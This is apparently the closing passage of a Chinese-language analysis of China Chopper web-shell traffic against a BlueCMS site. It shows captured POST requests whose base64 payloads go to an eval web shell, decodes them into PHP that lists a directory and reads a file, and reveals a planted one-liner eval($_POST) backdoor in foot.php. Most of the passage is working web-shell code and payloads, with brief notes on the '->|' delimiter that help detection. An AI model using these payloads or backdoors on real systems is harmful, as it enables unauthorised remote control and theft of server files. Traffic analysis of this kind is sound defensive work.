Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\
// 获取目标服务器 C:\\phpstudy\\WWW\\bluecms\\data\\ 目录的所有文件
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
// 获取 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php 文件内容
->|<?php eval($_POST['cmd_shell']);?>|<
也可以根据菜刀用于分隔自己的命令和程序本身输出的 HTML 的分隔符 , 例如 : ->|
到这里基本上也就分析差不多了